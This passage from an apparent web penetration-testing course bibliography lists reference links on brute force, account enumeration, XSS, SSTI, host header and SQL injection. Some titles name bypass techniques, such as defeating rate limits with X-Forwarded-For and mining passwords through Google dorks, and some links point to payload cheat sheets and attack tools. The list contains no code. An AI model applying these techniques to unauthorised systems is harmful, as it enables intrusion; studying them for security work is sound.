• Installing Burp's CA Certificate in Chrome on Linux: https://support.portswigger.net/customer/portal/articles/2956765-installing-burp-s-ca-certificate-in-chrome-on-linux

0x04. Basic Concepts of the HTTP GET and HTTP POST Methods

• Reference of HTTP Methods: https://www.w3schools.com/tags/ref_httpmethods.asp

• Hypertext Transfer Protocol: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol


0x05. Information Disclosure via Search Engine

• How Search Engines Gather and Organize Data: https://www.dummies.com/web-design-development/search-engine-optimization/how-searc

• Bot Directory: https://www.distilnetworks.com/bot-directory/category/search-engine/

• List of All User Agents from Top Search Engines: https://perishablepress.com/list-all-user-agents-top-search-engines/

• Google Dork Query: https://whatis.techtarget.com/definition/Google-dork-query

• Google Hacking Database: https://www.exploit-db.com/google-hacking-database

• Block search indexing with 'noindex': https://support.google.com/webmasters/answer/93710

• Microsoft Yammer OAuth Token Bypass Vulnerability: https://www.vulnerabilitydb.com/?q=articles/2013/08/04/microsoft-yammer-%E2%80

• Information Disclosure at PayPal via Search Engine: http://firstsight.me/2017/12/information-disclosure-at-paypal-and-xoom-paypal-acquisitio

• How I used a simple Google query to mine passwords from dozens of public Trello boards: https://hakin9.org/how-i-used-a-simple-google-query-to-mine-passwords-from-dozens-of-public-trello-boards/

0x06. Brute Force Attack

• Definition of Brute Force Attack: https://www.kaspersky.com/resource-center/definitions/brute-force-attack

• What is a Brute Force Attack: https://www.varonis.com/blog/brute-force-attack/

• Bypassing Google's Authentication to Access Their Internal Admin Panels: https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3

• Vulnerable Demonstration Site by Acunetix: http://testphp.vulnweb.com/login.php

• Damn Vulnerable Web Application: http://www.dvwa.co.uk/

• Hacking Any Facebook Account by Bypassing the OTP via Brute Force Attack: http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html

• [Video] Hacking Any Facebook Account by Bypassing the OTP via Brute Force Attack: https://www.youtube.com/watch?v=U3Of-jF1nWo

• The 'Basic' HTTP Authentication Scheme: https://tools.ietf.org/html/rfc7617

• The general HTTP authentication framework: https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication

• HTTP Authentication: https://www.httpwatch.com/httpgallery/authentication/

• A set of HTTP/1.1 features: https://jigsaw.w3.org/HTTP/

• Payload Processing (Rules and Encoding) in Burp Suite: https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/processing#payload-processing-rules

• HTTP Basic Authentication Dictionary and Brute-force Attacks with Burp Suite: http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/

• Use Burp Suite to Brute-force HTTP Basic Authentication: https://securityonline.info/use-burp-suite-brute-force-http-basic-authentication

• [Veris] Bypassing CAPTCHA by Removing the CAPTCHA Parameters: https://hackerone.com/reports/124173

• [Instacart] Bypassing Brute Force Attack Prevention by Using a Mobile Request: https://hackerone.com/reports/160109

• [Dashlane] Login Attempt Throttling Bypass by Adding the X-Forwarded-For Header: https://hackerone.com/reports/225897

• X-Forwarded-For header: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For

• [Asus] Bypassing CAPTCHA by Using the Mobile API: http://firstsight.me/2017/12/lack-of-binary-protection-at-asus-vivo-baby-and-hivivo-for-andr

• [Weblate] Bypassing Brute Force Protection by Changing the IP Address: https://hackerone.com/reports/224460

0x07. Checking for Account Enumeration

• OWASP Testing Guide - Testing for User Enumeration and Guessable User Account: https://www.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002)

• About User Enumeration: https://blog.rapid7.com/2017/06/15/about-user-enumeration/

• [Infogram] User Enumeration via Forgot Password Feature: https://hackerone.com/reports/280509

• [Veris] User Enumeration via Error Message at Login Form: https://hackerone.com/reports/123496

• [HackerOne] Enumeration of Users via Registration (Sign Up) Feature: https://hackerone.com/reports/761

• [Weblate] User Enumeration when Adding Email to Account: https://hackerone.com/reports/223531

• [Xoom] Account Enumeration via Search Engine: http://firstsight.me/2017/12/information-disclosure-at-paypal-and-xoom-paypal-acquisition-

0x08. References for Common Account and Password Checking

• [ownCloud] Password complexity not enforced on password change: https://hackerone.com/reports/276123

• [Legal Robot] Bypass 8-character password complexity with 6 characters only due to insecure password reset functionality: https://hackerone.com/re

• [Legal Robot] Password Complexity Ignores Empty Spaces: https://hackerone.com/reports/250253

• Authentication Cheat Sheet by OWASP: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html

0x09. Cross Site Scripting

• Rapid7 tCell Application Security Report: https://www.rapid7.com/globalassets/_pdfs/whitepaperguide/rapid7-tcell-application-security-report.pdf

• OWASP TOP 10 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

• OWASP TOP 10 2017 - A7 Cross Site Scripting: https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)

• Cross Site Scripting: https://portswigger.net/web-security/cross-site-scripting

• Cross Site Scripting: https://www.veracode.com/security/xss

• Testing for Reflected Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

• Testing for Stored Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)

• Testing for DOM-based Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)

• Stored Cross Site Scripting Attacks: https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/

• Reflected Cross Site Scripting: https://shieldfy.io/security-wiki/cross-site-scripting-xss/reflected-xss

• DOM Cross Site Scripting: https://medium.com/iocscan/dom-based-cross-site-scripting-dom-xss-3396453364fd

• Reflected XSS on Shopify: https://hackerone.com/reports/422707

• Stored XSS on Snapchat: https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd

• Persistent DOM-based XSS in https://help.twitter.com via localStorage: https://hackerone.com/reports/297968

• XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

• Blind XSS on Tokopedia's Internal Panel: https://noobsec.org/project/2018-11-23-blind-xss-pada-internal-panel-tokopedia/

0x10. Content Injection

• Content Spoofing: https://www.owasp.org/index.php/Content_Spoofing

• [SEMrush] Error Page Content Spoofing or Text Injection: https://hackerone.com/reports/327671

• [LocalTapiola] Error Page Content Spoofing or Text Injection: https://hackerone.com/reports/181594

• [Harvest] Text and HTML Injection at First and Last Name Parameters: https://hackerone.com/reports/152577

• [Slack] HTML Injection Inside Slack Promotional Emails: https://hackerone.com/reports/321029

• [Infogram] HTML Injection at Employee ID: https://hackerone.com/reports/283742

0x11. Server-Side Template Injection

• Server-Side Template Injection: RCE for the modern webapp: https://portswigger.net/kb/papers/serversidetemplateinjection.pdf

• Server-Side Template Injection Introduction & Example: https://www.netsparker.com/blog/web-security/server-side-template-injection/

• Exploiting Server Side Template Injection With Tplmap: https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf

• PayloadsAllTheThings - Template Injection: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

• Uber.com may RCE by Flask Jinja2 Template Injection: https://hackerone.com/reports/125980

• [Intel] Bug Hunting in Web Apps: https://www.owasp.org/images/c/ce/OWASPLondon20170928-Suleman_Malik-PDF.pdf

• Tplmap: https://github.com/epinna/tplmap

0x12. Host Header Injection

• Web Servers and the Host Header: https://serversforhackers.com/c/webservers-host-header

• What Is a Host Header? https://www.itprotoday.com/devops-and-software-development/what-host-header

• Practical HTTP Host Header Attacks: https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

• Host Header Injection: https://lightningsecurity.io/blog/host-header-injection/

• [Whisper] Host Header Injection - Redirection: https://hackerone.com/reports/94637

• [Mavenlink] Password reset link allows redirect injection to a malicious URL: https://hackerone.com/reports/281575

0x13. SQL Injection

• Akamai Q4 2017 State of the Internet Security Report: https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q4-2017-state-of-the-internet-security-report.pdf

• OWASP TOP 10 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

• OWASP TOP 10 2017 - A1 Injection: https://www.owasp.org/index.php/Top_10-2017_A1-Injection

• SQL Injection Cheat Sheet: https://portswigger.net/web-security/sql-injection/cheat-sheet

• Blind SQL Injection Tutorial: http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html

• How to Prevent SQL Injection Attacks: https://www.wordfence.com/learn/how-to-prevent-sql-injection-attacks/

• What is SQL Injection (SQLi) and How to Prevent It: https://www.acunetix.com/websitesecurity/sql-injection/

• [Nutanix] SQL Injection on Bootcamp: https://blog.securitybreached.org/2018/09/08/sqli-bootcampnutanix-com-bug-bounty-poc/

• [Zomato] Boolean Blind SQL Injection: https://hackerone.com/reports/297534

• PoC - Blind SQL Injection through Boolean-based User-Agent: https://medium.com/@frostnull1337/sql-injection-through-user-agent-44a1150f6888

• [Starbucks] Time-Based Blind SQL Injection: https://timeofcheck.com/time-based-blind-sqli-on-news-starbucks-com/

• Methodology: SQL Injection Authentication Bypass: https://support.portswigger.net/customer/portal/articles/2791007-Methodology_SQL_Injection_Authentication_.html

• SQL Injection Authentication Bypass Cheat Sheet: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

• sqlmap repository: https://github.com/sqlmapproject/sqlmap